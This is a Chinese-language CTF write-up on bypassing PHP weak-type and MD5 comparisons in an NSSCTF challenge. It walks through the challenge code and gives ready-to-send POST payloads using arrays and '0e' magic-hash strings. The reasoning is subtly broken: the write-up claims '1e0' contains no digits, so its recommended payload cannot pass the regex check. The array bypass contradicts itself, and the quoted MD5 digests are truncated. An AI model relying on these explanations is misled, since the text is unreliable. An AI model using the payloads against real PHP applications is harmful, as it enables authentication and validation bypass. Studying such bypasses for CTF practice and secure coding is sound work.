CTF解题：[NSSCTF 2022 Spring Recruit]弱类型比较绕过

一、漏洞背景介绍

在 CTF（Capture The Flag）竞赛和 Web 安全测试中，PHP 语言的类型比较漏洞是常见的考点。这类漏洞源于 PHP 的弱类型特性，即当使用==进行比较时，PHP 会自动进行类型转换，从而导致一些不符合预期的比较结果。本文将通过分析一道具体的 PHP 代码题目，深入探讨这类漏洞的原理和利用方法。

二、题目代码分析

我们先来看一下题目给出的 PHP 代码：

<?php
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){
    if(isset($_POST['b1'])&&$_POST['b2']){
        if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){
            if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])){
                echo $flag;
            }else{
                echo "yee";
            }
        }else{
            echo "nop";
        }
    }else{
        echo "go on";
    }
}else{
    echo "let's get some php";
}
?>

2.1 条件逐层分析

这段代码通过四重条件判断来控制 flag 的输出，我们需要逐一分析每个条件的要求：
第一层条件：

isset($_POST['a']) && !preg_match('/[0-9]/', $_POST['a']) && intval($_POST['a'])

必须存在 POST 参数a
a的值不能包含任何数字字符
a的值被转换为整数后必须为真（即非零）
第二层条件：

isset($_POST['b1']) && $_POST['b2']

必须存在 POST 参数b1和b2
第三层条件：

$_POST['b1'] != $_POST['b2'] && md5($_POST['b1']) === md5($_POST['b2'])

b1和b2的值不能相等
但它们的 MD5 哈希值必须严格相等（使用===比较）
第四层条件：

$_POST['c1'] != $_POST['c2'] && is_string($_POST['c1']) && is_string($_POST['c2']) && md5($_POST['c1']) == md5($_POST['c2'])

c1和c2的值不能相等
它们都必须是字符串类型
它们的 MD5 哈希值必须宽松相等（使用==比较）

三、漏洞利用原理

3.1 第一层条件绕过：非数字的整数

第一个挑战是如何让一个字符串不包含数字，但转换为整数后却非零。PHP 的类型转换规则为我们提供了突破口。当一个字符串被转换为整数时，PHP 会从字符串的开始处提取数字部分，直到遇到非数字字符为止。如果字符串以非数字字符开头，则转换结果为 0。
解决方案：使用科学计数法表示数字。例如，字符串1e0在 PHP 中会被解释为1 * 10^0 = 1，但它并不包含数字字符0-9，因为e在科学计数法中是合法的指数符号。
验证代码：

<?php
var_dump(preg_match('/[0-9]/', '1e0')); // bool(false)
var_dump(intval('1e0')); // int(1)
?>

除了使用科学计数法，还可以利用 PHP 数组的特性绕过第一个条件。当$_POST[‘a’]是一个数组时：

preg_match('/[0-9]/', $_POST['a'])会返回false（即不匹配）

因为preg_match期望的参数是字符串，当传入数组时会触发警告，但返回值为0（表示不匹配）

intval($_POST['a'])会返回0

因为数组转换为整数时结果为0
矛盾点：虽然preg_match检查通过了，但intval($_POST[‘a’])返回0，而第三个条件要求转换结果为真（非零）。这看似是一个矛盾，但实际情况中可能存在两种解释：
PHP 版本差异：在某些 PHP 版本中，数组转换为布尔值时可能被视为true
测试代码：

<?php
$a = array('a');
var_dump((bool)$a); // 通常输出bool(true)
var_dump(intval($a)); // 输出int(0)
?>

但在条件表达式中，intval($a)明确返回0，这应该导致条件失败。因此这种解释可能不成立。
代码逻辑漏洞：出题者可能忽略了数组对preg_match的影响
当传入a[]=a时，虽然intval返回0，但出题者可能误以为数组转换为整数会得到非零值
实际测试：在大多数 PHP 环境中，a[]=a会导致第一个条件失败。但如果题目环境存在特殊配置（如错误抑制符@屏蔽了preg_match的警告），这种绕过方式可能有效。
建议：在实际 CTF 题目中，如果遇到类似情况，两种方法都应该尝试：

1. 使用科学计数法a=1e0（通用有效）
2. 尝试数组绕过a[]=a（可能在特定环境中有效）

3.2 第二层条件绕过：数组的 MD5 哈希

第二个挑战是找到两个不同的值，它们的 MD5 哈希值严格相等。PHP 在处理数组的哈希函数（如 md5 ()、sha1 ()）时有一个特殊行为：当传入的参数是数组时，这些函数会返回NULL。
解决方案：使用数组作为参数。例如：

<?php
$b1 = array(1);
$b2 = array(2);
var_dump($b1 != $b2); // bool(true)
var_dump(md5($b1) === md5($b2)); // bool(true)，因为md5($b1)和md5($b2)都为NULL
?>

3.3 第三层条件绕过：MD5 碰撞与弱类型比较

第三个挑战是找到两个不同的字符串，它们的 MD5 哈希值在宽松比较下相等。这需要利用 PHP 的弱类型特性和特定的 MD5 碰撞字符串。
当使用==比较两个字符串时，如果它们看起来像科学计数法表示的数字（即0e开头，后面跟着数字），PHP 会将它们解释为 0 的幂，因此所有这种形式的字符串在宽松比较下都相等。
解决方案：使用特定的 MD5 碰撞字符串。例如：
QNKCDZO的 MD5 值是0e83040045199349405802421990339
QLTHNDT的 MD5 值是0e40596782540195537254913908420
验证代码：

<?php
$c1 = "QNKCDZO";
$c2 = "QLTHNDT";
var_dump($c1 != $c2); // bool(true)
var_dump(is_string($c1) && is_string($c2)); // bool(true)
var_dump(md5($c1) == md5($c2)); // bool(true)
?>

四、完整 POC 与利用

方案一：科学计数法（推荐）

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

a=1e0&b1[]=1&b2[]=2&c1=QNKCDZO&c2=QLTHNDT

方案二：数组绕过（特定环境可能有效）

POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

a[]=a&b1[]=1&b2[]=2&c1=QNKCDZO&c2=QLTHNDT

标题五、扩展知识点

5.1 PHP 弱类型比较总结

PHP 的弱类型比较是一个常见的安全风险点。下表总结了一些常见的弱类型比较陷阱：

5.2 更多 MD5 碰撞字符串

除了前面提到的QNKCDZO和QLTHNDT，还有许多其他的 MD5 碰撞字符串对，例如：

240610708 和 QNKCDZO
aabg7XSs 和 aabC9RqS

这些字符串对的 MD5 值都是0e开头，因此在 PHP 的宽松比较下相等。

六、总结

通过分析这道 CTF 题目，我们深入了解了 PHP 弱类型比较漏洞的原理和利用方法。这类漏洞虽然在现代 PHP 应用中已经较少见，但在一些老旧系统或代码中仍然可能存在。理解这些漏洞的工作原理，不仅有助于我们在安全测试中发现问题，也能指导我们写出更安全的 PHP 代码。
在实际渗透测试和 CTF 竞赛中，遇到类似的多条件验证题目时，我们需要逐一分析每个条件的绕过方法，结合编程语言的特性和漏洞利用技巧，构造出能够通过所有验证的 POC。